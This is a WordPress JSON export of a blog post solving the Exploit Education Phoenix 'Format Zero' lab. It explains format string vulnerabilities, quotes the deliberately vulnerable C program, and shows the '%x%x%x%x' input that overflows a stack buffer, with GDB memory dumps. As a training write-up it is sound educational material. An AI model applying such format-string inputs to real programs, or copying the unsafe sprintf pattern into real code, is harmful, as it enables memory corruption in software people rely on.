{"id":540,"date":"2019-07-18T09:48:37","date_gmt":"2019-07-18T13:48:37","guid":{"rendered":"https:\/\/blog.lamarranet.com\/?p=540"},"modified":"2020-12-15T08:03:55","modified_gmt":"2020-12-15T13:03:55","slug":"exploit-education-phoenix-format-zero-solution","status":"publish","type":"post","link":"https:\/\/blog.lamarranet.com\/index.php\/exploit-education-phoenix-format-zero-solution\/","title":{"rendered":"Exploit Education | Phoenix | Format Zero Solution"},"content":{"rendered":"

The description and source code can be found here:
\nhttp:\/\/exploit.education\/phoenix\/format-zero\/<\/a><\/p>\n

Now it’s time to learn about format string vulnerabilities. I won’t go into great detail about this particular type of vulnerability since there’s a lot of resources on the Internet that can give a better explanation than I can (just do a search on “format string vulnerability”). Basically, these occur when the programmer uses the “printf” family of functions without a “format string.” For instance, if there’s a character array variable (called “name” in this example) that is filled with user-supplied input, the correct way to display the contents would be like this:<\/p>\n

printf("%s\\n", name);<\/pre>\n
The “%s\\n” <\/span> is the format string here, telling the printf() <\/span>function to display the name<\/strong> variable as a string. Printing the contents of the variable this way would cause a format string vulnerability:<\/p>\n
printf(name);\r\nprintf("\\n");<\/pre>\n
The vulnerability occurs because the user can supply their own format string. If the user were to input something like “%08x.%08x.%08x.%08x” <\/span>as their name, the printf() <\/span>function would display information on the stack where it was called from as it would expect 4 values to have been pushed as arguments for the format string. The output might look something like ffffe920.ffffe243.00000000.fefefeff<\/span>.<\/p>\n
This first level is relatively straightforward, we need to modify the changeme<\/strong> variable. Let’s look at the source code. First, a struct is created with 2 variables, dest[32] and changeme (int). Another variable, called buffer[16], is declared and the banner is printed.<\/p>\n
#define BANNER \\\r\n  "Welcome to " LEVELNAME ", brought to you by https:\/\/exploit.education"\r\n\r\nint main(int argc, char **argv) {\r\n  struct {\r\n    char dest[32];\r\n    volatile int changeme;\r\n  } locals;\r\n  char buffer[16];\r\n\r\n  printf("%s\\n", BANNER);\r\n...<\/pre>\n
Next, the program asks for user input to store into the buffer<\/strong> variable. This will store at most 15 characters. It then ensures NULL termination of that variable by setting the last element to a NULL byte and sets the changeme<\/strong> variable to a NULL value as well.<\/p>\n
  if (fgets(buffer, sizeof(buffer) - 1, stdin) == NULL) {\r\n    errx(1, "Unable to get buffer");\r\n  }\r\n  buffer[15] = 0;\r\n\r\n  locals.changeme = 0;<\/pre>\n
Next, we have the format string vulnerability with the sprintf() <\/span>function. It simply takes the user-supplied input and writes it to the dest<\/strong> variable. Finally, the program prints a message depending on weather or not the changeme<\/strong> variable was changed or not and exits.<\/p>\n
  sprintf(locals.dest, buffer);\r\n\r\n  if (locals.changeme != 0) {\r\n    puts("Well done, the 'changeme' variable has been changed!");\r\n  } else {\r\n    puts(\r\n        "Uh oh, 'changeme' has not yet been changed. Would you like to try "\r\n        "again?");\r\n  }\r\n\r\n  exit(0);\r\n}<\/pre>\n
We need to modify the changeme<\/strong> variable that is placed on the stack next to the dest<\/strong> variable. However, we can’t just supply more information than dest<\/strong> can hold as our input is limited to 15 characters. However, we can take advantage of the format string vulnerability. If we supply “%x<\/strong>” as input, only 2 characters are used. When that goes through the sprintf() <\/span>function, it comes out as an 8 character hex value from the stack. So to fill the dest<\/strong> variable, we only need 4 of those “%x” format specifiers. And since the user presses “enter” at the end of their input, the sprintf() <\/span>function will save the newline character (0x0a) as well, which would cause an overflow. Let’s test it out:<\/p>\n
user@phoenix-amd64:~$ \/opt\/phoenix\/amd64\/format-zero \r\nWelcome to phoenix\/format-zero, brought to you by https:\/\/exploit.education\r\n%x%x%x\r\nUh oh, 'changeme' has not yet been changed. Would you like to try again?\r\n\r\nuser@phoenix-amd64:~$ \/opt\/phoenix\/amd64\/format-zero \r\nWelcome to phoenix\/format-zero, brought to you by https:\/\/exploit.education\r\n%x%x%x%x\r\nWell done, the 'changeme' variable has been changed!<\/pre>\n
We can also use GDB to see how it looks in memory:<\/p>\n
user@phoenix-amd64:~$ gdb -q \/opt\/phoenix\/amd64\/format-zero \r\nGEF for linux ready, type `gef' to start, `gef config' to configure\r\n71 commands loaded for GDB 8.2.1 using Python engine 3.5\r\n[*] 2 commands could not be loaded, run `gef missing` to know why.\r\nReading symbols from \/opt\/phoenix\/amd64\/format-zero...(no debugging symbols found)...done.\r\n\r\ngef> disas main\r\nDump of assembler code for function main:\r\n...\r\n   0x00000000004006e7 <+74>:    mov    BYTE PTR [rbp-0x31],0x0\r\n   0x00000000004006eb <+78>:    mov    DWORD PTR [rbp-0x10],0x0\r\n   0x00000000004006f2 <+85>:    lea    rdx,[rbp-0x40]\r\n   0x00000000004006f6 <+89>:    lea    rax,[rbp-0x30]\r\n   0x00000000004006fa <+93>:    mov    rsi,rdx\r\n   0x00000000004006fd <+96>:    mov    rdi,rax\r\n   0x0000000000400700 <+99>:    mov    eax,0x0\r\n   0x0000000000400705 <+104>:   call   0x400500 <sprintf@plt>\r\n...<\/pre>\n
We can see that the addresses for the buffer<\/strong> and locals.dest<\/strong> variables are loaded into RDX and RAX as arguments for the sprintf() <\/span>function at main+85 & main+89. That tells me that I should be watching the memory on the stack starting at RBP-0x40. I’ll break before the sprintf() <\/span>function call and use the GEF “memory watch” command so I can see what the stack looks like before & after the call. Also note that we know the changeme<\/strong> variable is at RBP-0x10 as that’s where the NULL value is loaded into there in the disassembly.<\/p>\n
gef> b *main+99\r\nBreakpoint 1 at 0x400700\r\n\r\ngef> run < <(echo %x%x%x%x)\r\nStarting program: \/opt\/phoenix\/amd64\/format-zero < <(echo %x%x%x%x)\r\nWelcome to phoenix\/format-zero, brought to you by https:\/\/exploit.education\r\nBreakpoint 1, 0x0000000000400700 in main ()\r\n\r\n[... GEF output snipped ...]\r\n\r\ngef> p $rbp\r\n$1 = (void *) 0x7fffffffe690\r\n\r\ngef> memory watch $rbp-0x40 8 qword\r\n[+] Adding memwatch to 0x7fffffffe650\r\n\r\ngef> n\r\n0x0000000000400705 in main ()\r\n\r\n[... GEF output snipped ...]\r\n\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 memory:0x7fffffffe650 \u2500\u2500\u2500\u2500\r\n0x00007fffffffe650\u2502+0x0000 0x7825782578257825\r\n0x00007fffffffe658\u2502+0x0008 0x000000000000000a\r\n0x00007fffffffe660\u2502+0x0010 0x0000000000000000\r\n0x00007fffffffe668\u2502+0x0018 0x00007fffffffe6e8\r\n0x00007fffffffe670\u2502+0x0020 0x0000000000000001\r\n0x00007fffffffe678\u2502+0x0028 0x00007fffffffe6f8\r\n0x00007fffffffe680\u2502+0x0030 0x0000000000000000\r\n0x00007fffffffe688\u2502+0x0038 0x0000000000000000\r\n\r\n[... GEF output snipped ...]\r\n\r\ngef> n\r\n0x000000000040070a in main ()\r\n\r\n[... GEF output snipped ...]\r\n\r\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 memory:0x7fffffffe650 \u2500\u2500\u2500\u2500\r\n0x00007fffffffe650\u2502+0x0000 0x7825782578257825\r\n0x00007fffffffe658\u2502+0x0008 0x000000000000000a\r\n0x00007fffffffe660\u2502+0x0010 0x3035366566666666\r\n0x00007fffffffe668\u2502+0x0018 0x3033356366663766\r\n0x00007fffffffe670\u2502+0x0020 0x3030336266663766\r\n0x00007fffffffe678\u2502+0x0028 0x6630366566666666\r\n0x00007fffffffe680\u2502+0x0030 0x000000000000000a\r\n0x00007fffffffe688\u2502+0x0038 0x0000000000000000\r\n\r\n[... GEF output snipped ...]\r\n\r\ngef> c\r\nContinuing.\r\nWell done, the 'changeme' variable has been changed!\r\n[Inferior 1 (process 348) exited normally]<\/pre>\n
We can see the stack gets filled with seemingly random data from other parts of the stack where the dest<\/strong> variable is. You can also see the newline character (0x0a) gets put at 0x7fffffffe680, thus, overwriting the changeme<\/strong> variable.<\/p>\n","protected":false},"excerpt":{"rendered":"
This level introduces format strings, and how attacker supplied format strings can modify program execution … Continue readingExploit Education | Phoenix | Format Zero Solution<\/span><\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5],"tags":[],"class_list":["post-540","post","type-post","status-publish","format-standard","hentry","category-solutions"],"_links":{"self":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/540","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/comments?post=540"}],"version-history":[{"count":13,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/540\/revisions"}],"predecessor-version":[{"id":1467,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/posts\/540\/revisions\/1467"}],"wp:attachment":[{"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/media?parent=540"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/categories?post=540"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.lamarranet.com\/index.php\/wp-json\/wp\/v2\/tags?post=540"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}